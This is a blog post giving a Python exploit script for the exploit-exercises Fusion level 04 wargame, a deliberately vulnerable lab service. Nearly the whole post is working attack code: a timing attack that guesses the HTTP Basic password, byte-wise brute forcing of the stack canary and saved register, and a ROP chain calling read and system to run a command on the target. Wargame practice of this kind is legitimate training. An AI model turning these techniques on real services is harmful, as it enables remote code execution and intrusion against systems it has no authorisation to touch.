Computer Security/WarGame
[exploit-exercises] Fusion level 04
tunz
2013. 7. 12. 11:52
from socket import * import time import base64 from struct import * base_addr = 0xb782970d - 0x170d # get from stack smashing information libc_base = 0xb7698113 - 0xf3 - 0x19020 # get from stack smashing information read = base_addr + 0xd20 system = libc_base + 0x3cb20 pppr = base_addr + 0x19ba bss = base_addr + 0x4240 + 0x300 # password check """ lists = range(ord('0'),ord('9')+1) + range(ord('a'),ord('z')+1) + range(ord('A'),ord('Z')+1) j=0 password = "" while j<16: for i in lists: print password+chr(i) s = socket(AF_INET, SOCK_STREAM) s.connect(('192.168.197.130',20004)) s_time = time.time() s.send("GET / HTTP/1.0\r\nAuthorization: Basic "+base64.encodestring(password+chr(i))+"\r\n\r\n") s.recv(1024) e_time = time.time() if (e_time - s_time) < 0.002: password += chr(i) break j=j+1 """ password = "bdRT5ifONhSSbXUy" print "Password is "+password # canary check """ lists = range(0,0x100) j=0 canary = "" while j<4: for i in lists: print hex(i) s = socket(AF_INET, SOCK_STREAM) s.connect(('192.168.197.130',20004)) s_time = time.time() payload = password payload += "A"*(2032) payload += canary payload += chr(i) payload = base64.encodestring(payload).replace("\n","") s.send("GET / HTTP/1.0\r\nAuthorization: Basic "+payload+"\r\n\r\n") data = s.recv(1024) e_time = time.time() if "stack smashing" not in data: canary += chr(i) break j=j+1 print "canary: "+hex(unpack('<L',canary)[0]) """ canary = pack('<L',0x36c9bf00) #ebx check """ lists = range(0,0x100) j=0 ebx = "" while j<4: for i in lists: print hex(i) s = socket(AF_INET, SOCK_STREAM) s.connect(('192.168.197.130',20004)) payload = password payload += "A"*(2032) payload += canary payload += "A"*12 payload += ebx+chr(i) payload = base64.encodestring(payload).replace("\n","") s.send("GET / HTTP/1.0\r\nAuthorization: Basic "+payload+"\r\n\r\n") try: data = s.recv(1024) except: data = "" if "HTTP/1.0 200 Ok" in data: ebx += chr(i) break j=j+1 print "ebx: "+hex(unpack('<L',ebx)[0]) """ ebx = pack('<L',0xb782c118) s = socket(AF_INET, SOCK_STREAM) s.connect(('192.168.197.130',20004)) raw_input('go?') s.send("GET / HTTP/1.0\r\n") cmd = "id\x00" payload = password payload += "A"*(2032) payload += canary payload += "A"*12 payload += ebx payload += "A"*12 payload += pack('<L',read) payload += pack('<L',pppr) payload += pack('<L',0) payload += pack('<L',bss) payload += pack('<L',len(cmd)) payload += pack('<L',system) payload += "AAAA" payload += pack('<L',bss) payload = base64.encodestring(payload).replace("\n","") s.send("Authorization: Basic "+payload+"\r\n") time.sleep(0.5) s.send(cmd) time.sleep(0.5) print s.recv(1024) s.close()